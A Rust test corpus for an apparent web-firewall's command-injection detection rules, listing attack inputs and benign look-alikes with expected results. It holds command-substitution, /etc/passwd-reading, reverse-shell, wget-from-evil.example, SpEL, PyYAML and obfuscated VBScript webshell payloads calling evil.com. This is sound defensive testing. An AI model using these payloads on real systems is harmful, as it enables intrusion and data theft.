// SPDX-FileCopyrightText: 2026 0x00spor3
// SPDX-License-Identifier: Apache-2.0

//! RCE / command-injection corpus cases. Field coverage: query + cookies + body.
//! Rules (paranoia): cmd-substitution 1, chained-command 1, shell-path 1,
//! reverse-shell 1, backtick 2, ifs-evasion 2, download-exec 2, windows-shell 2,
//! logical-operator 3.

use crate::{Case, Expect, Field, Module};

pub static CASES: &[Case] = &[
    // ── malicious: one per rule ────────────────────────────────────────────────
    Case {
        id: "rce-cmd-substitution-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "$(whoami)" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-cmd-substitution"],
        desc: "$() command substitution",
    },
    Case {
        id: "rce-chained-command-query",
        module: Module::Rce,
        field: Field::Query { name: "host", value: "target; whoami" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "shell separator followed by a known command",
    },
    Case {
        id: "rce-shell-path-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "/bin/bash -c id" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-shell-path"],
        desc: "explicit shell binary path",
    },
    Case {
        id: "rce-reverse-shell-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "mkfifo /tmp/backpipe" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-reverse-shell"],
        desc: "mkfifo reverse-shell idiom (isolated from private-IP rules)",
    },
    Case {
        id: "rce-backtick-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "`id`" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-backtick"],
        desc: "backtick command substitution (Warning/PL2)",
    },
    Case {
        id: "rce-ifs-evasion-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "echo${IFS}test" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-ifs-evasion"],
        desc: "${IFS} space-smuggling (Warning/PL2)",
    },
    Case {
        id: "rce-download-exec-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "wget http://evil.example/x.sh" },
        min_pl: 2,
        expect: Expect::Triggers,
        // also fires rfi-remote-url (bare http://, PL3) — assert the RCE rule.
        rules: &["rce-download-exec"],
        desc: "remote payload fetch via wget (Warning/PL2); overlaps rfi-remote-url",
    },
    Case {
        id: "rce-windows-shell-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "cmd /c dir" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-windows-shell"],
        desc: "Windows cmd /c invocation (Warning/PL2)",
    },
    Case {
        id: "rce-logical-operator-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "a && b" },
        min_pl: 3,
        expect: Expect::Triggers,
        rules: &["rce-logical-operator"],
        desc: "bare && logical operator (Notice/PL3); also exercises &-encoding in the testkit",
    },
    // ── Base64Flat harvest (Fase 10c) — recall-lock under §6 base64-decode ───────
    // Not a gotestwaf-tracked deferral; pins that the derived channel feeds RCE too.
    Case {
        id: "rce-chained-command-b64",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "OyBjYXQgL2V0Yy9wYXNzd2Q" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "base64(`; cat /etc/passwd`) — caught at 10c via base64-decode",
    },
    // ── benign / traps ─────────────────────────────────────────────────────────
    Case {
        id: "rce-benign-cats-and-dogs",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "I like cats and dogs" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "'cat' inside 'cats' with no separator must not chain",
    },
    Case {
        id: "rce-benign-bin-path",
        module: Module::Rce,
        field: Field::Query { name: "path", value: "/usr/local/bin" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "a /bin directory that is not /bin/sh|bash",
    },
    Case {
        id: "rce-benign-prose",
        module: Module::Rce,
        field: Field::Query { name: "desc", value: "fast and reliable service" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "plain prose, no shell metacharacters",
    },
    // ── URL-PATH command injection (Fase 10a B2) — gotestwaf rce-urlpath ──────────
    Case {
        id: "rce-urlpath-chained-ls",
        module: Module::Rce,
        field: Field::Path("/cmd=127.0.0.1 && ls /etc"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`&& ls` in the URL path — gotestwaf rce-urlpath (URL)",
    },
    Case {
        id: "rce-urlpath-chained-cat",
        module: Module::Rce,
        field: Field::Path("/; cat /et'c/pa'ss'wd"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`; cat` in the URL path — gotestwaf rce-urlpath (URL)",
    },
    Case {
        id: "rce-urlpath-backtick",
        module: Module::Rce,
        field: Field::Path("/ax--exec=`id`--remote=origin"),
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-backtick"],
        desc: "backtick command substitution in the URL path — gotestwaf rce-urlpath (URL, PL2)",
    },
    Case {
        id: "rce-benign-path",
        module: Module::Rce,
        field: Field::Path("/api/v1/users/list"),
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "an ordinary REST path — must NOT flag now that the path is inspected",
    },
    // ── Fase 10b B2: shell-injection + rce-urlparam broadening ───────────────────
    Case {
        id: "rce-chained-getent-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "|getent hosts somehost.example.net&" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "`|getent` host lookup (OOB) — gotestwaf shell-injection (URL)",
    },
    Case {
        id: "rce-windows-set-arith-query",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "| set /a 3482*7301" },
        min_pl: 2,
        expect: Expect::Triggers,
        rules: &["rce-windows-shell"],
        desc: "Windows `set /a` arithmetic probe — gotestwaf shell-injection (URL, Warning/PL2)",
    },
    Case {
        id: "rce-yaml-deserialization-query",
        module: Module::Rce,
        field: Field::Query {
            name: "q",
            value: "!!python/object/new:exec [import socket; socket.gethostbyname('h.example.net')]",
        },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-yaml-deserialization"],
        desc: "PyYAML `!!python/object` deserialization gadget — gotestwaf rce-urlparam (URL)",
    },
    Case {
        id: "rce-benign-set-address",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "please set /address and /account fields" },
        min_pl: 2,
        expect: Expect::Clean,
        rules: &[],
        desc: "`set /address` prose — the `/[ap]\\b` anchor must NOT match (not `set /a `)",
    },
    Case {
        id: "rce-benign-getent-word",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "the contingent budget plan" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "'getent' substring inside 'contingent' without a `[;&|]` separator — must NOT match",
    },
    // ── P1-A: server-side expression-language / template code execution ──────────
    Case {
        id: "rce-el-php-print-query",
        module: Module::Rce,
        field: Field::Query { name: "cmd", value: "${@print(md5(31337))}" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-expression-language"],
        desc: "PHP expression `${@print(md5(…))}` — gotestwaf community-rce-rawrequests; \
               dangerous-function call inside `${}` (P1-A)",
    },
    Case {
        id: "rce-el-spel-runtime-path",
        module: Module::Rce,
        field: Field::Path("/#{T(java.lang.Runtime).getRuntime().exec('id')}"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-expression-language"],
        desc: "SpEL `#{…Runtime…exec(…)}` in the URL path — expression-language RCE (P1-A)",
    },
    Case {
        id: "rce-benign-el-interpolation",
        module: Module::Rce,
        field: Field::Query { name: "url", value: "${base_url}/api/${version}/users" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "benign `${var}` interpolation (no function call) — must NOT match expression-language",
    },
    Case {
        id: "rce-benign-el-userprop",
        module: Module::Rce,
        field: Field::Query { name: "tpl", value: "Welcome #{user.name}, your role is ${role}" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "benign `#{user.name}`/`${role}` property access (no dangerous call) — must NOT match",
    },
    // ── P1-B: header-surface (allowlist: Referer / X-Forwarded-* / custom x-*) ───
    Case {
        id: "rce-header-xcustom",
        module: Module::Rce,
        field: Field::Header { name: "x-71275e9846", value: "; cat /etc/passwd" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-chained-command"],
        desc: "command injection in a custom X- header — gotestwaf Header placeholder; allowlist (P1-B)",
    },
    Case {
        id: "rce-benign-header-excluded-ua",
        module: Module::Rce,
        field: Field::Header { name: "user-agent", value: "myapp/1.0; cat /etc/passwd scanner" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "attack-like text in User-Agent must NOT be content-inspected (excluded header) — P1-B",
    },
    Case {
        id: "rce-benign-header-xtoken-excluded",
        module: Module::Rce,
        field: Field::Header { name: "x-csrf-token", value: "; cat /etc/passwd" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "an x-*-token header is EXCLUDED even though x-* (deny-list precedence) — P1-B",
    },
    Case {
        id: "rce-benign-header-referer",
        module: Module::Rce,
        field: Field::Header { name: "referer", value: "https://example.com/search?q=cats and dogs&p=2" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "an ordinary Referer must stay clean under header inspection — P1-B FP guard",
    },
    // ── §6-D3: VBScript / Classic-ASP webshell de-obfuscation — now CAUGHT ────────
    // WIRE ground-truth (pcap bypass-new.txt L8030): the gotestwaf rce-urlparam VBScript
    // webshell. On the wire the string-concat `&` is a LITERAL query separator, so the
    // payload shatters across ~33 params — but the fragment carrying `On Error Resume
    // Next` survives INTACT and fires rce-vbscript-on-error (Critical). Exact wire query
    // embedded verbatim (percent-encoded, `&`-fragmented).
    Case {
        id: "rce-vbscript-asp-webshell-wire",
        module: Module::Rce,
        field: Field::RawQuery("e633eb2c01=Ev%20al%20%28%22Ex%22&%22e%22&%22cute%28%22%22Server.ScriptTimeout=3600:On%20Error%20Resume%20Next:Function%20bd%28byVal%20s%29:For%20i=1%20To%20Len%28s%29%20Step%202:c=M%22&%22i%22&%22d%28s%2Ci%2C2%29:If%20IsNumeric%28M%22&%22i%22&%22d%28s%2Ci%2C1%29%29%20Then:Ex%22&%22e%22&%22cute%28%22%22%22%22bd=bd&c%22&%22h%22&%22r%28&H%22%22%22%22&c&%22%22%22%22%29%22%22%22%22%29:Else:Ex%22&%22e%22&%22cute%28%22%22%22%22bd=bd&c%22&%22h%22&%22r%28&H%22%22%22%22&c&M%22&%22i%22&%22d%28s%2Ci%202%2C2%29&%22%22%22%22%29%22%22%22%22%29:i=i%202:End%20If%22%22&c%22&%22h%22&%22r%2810%29&%22%22Next:End%20Function:Response.Write%28%22%22%22%22@%2Alxl%2A@%22%22%22%22%29:Ex%22&%22e%22&%22cute%28%22%22%22%22On%20Error%20Resume%20Next:%22%22%22%22&bd%28%22%22%22%2244696d20686d3a536574206f626a584d4c3d5365727665722e4372656174654f626a65637428224d53584d4c322e536572766572584d4c4854545022293a6f626a584d4c2e6f70656e2022474554222c22687474703a2f2f6576696c2e636f6d2f6170692e7068703f6b65793d7c786c736c31736b733832646a6173647564736178787878222c66616c73653a6f626a584d4c2e73656e6428293a686d3d6f626a584d4c2e726573706f6e7365546578743a496620686d3c3e224f4b22205468656e3a526573706f6e73652e57726974652822454e4422293a456e642049663a526573706f6e73652e577269746528224c584c2229%22%22%22%22%29%29:Response.Write%28%22%22%22%22%2A@lxl@%2A%22%22%22%22%29:Response.End%22%22%29%22%29"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-vbscript-on-error"],
        desc: "WIRE: gotestwaf VBScript ASP webshell (rce-urlparam) — `&`-concat fragments the \
               query, but the intact `On Error Resume Next` fragment fires (§6-D3)",
    },
    // De-obf channel lock: the WELL-FORMED form a real attacker sends (`&` percent-encoded
    // as `%26` → ONE param value). `Server.Cr"&"eateObject(...)` is split by VBScript
    // concat; `strip_vbscript_concat` fuses it back to `Server.CreateObject(...)`.
    Case {
        id: "rce-vbscript-concat-deobf",
        module: Module::Rce,
        field: Field::RawQuery("q=Server.Cr%22%26%22eateObject%28%22WScript.Shell%22%29"),
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-vbscript-createobject"],
        desc: "well-formed (`%26`) VBScript `\"&\"`-concat Server.Cr\"&\"eateObject → de-obf fuses \
               to Server.CreateObject(\"WScript.Shell\") (§6-D3 de-obf channel)",
    },
    Case {
        id: "rce-vbscript-createobject-direct",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "CreateObject(\"WScript.Shell\")" },
        min_pl: 1,
        expect: Expect::Triggers,
        rules: &["rce-vbscript-createobject"],
        desc: "direct VBScript/COM webshell sink CreateObject(\"WScript.Shell\")",
    },
    // ── benign guards for §6-D3: anchors must keep ordinary input clean ──────────
    Case {
        id: "rce-benign-createobject-app",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "CreateObject(\"MyApp.Reporting.Service\")" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "non-dangerous progID — createobject rule anchored to WScript/MSXML/ADODB/… (no FP)",
    },
    Case {
        id: "rce-benign-error-prose",
        module: Module::Rce,
        field: Field::Query { name: "q", value: "An error occurred, please resume from the next record" },
        min_pl: 1,
        expect: Expect::Clean,
        rules: &[],
        desc: "prose with error/resume/next words — NOT the exact `On Error Resume Next` statement (no FP)",
    },
];
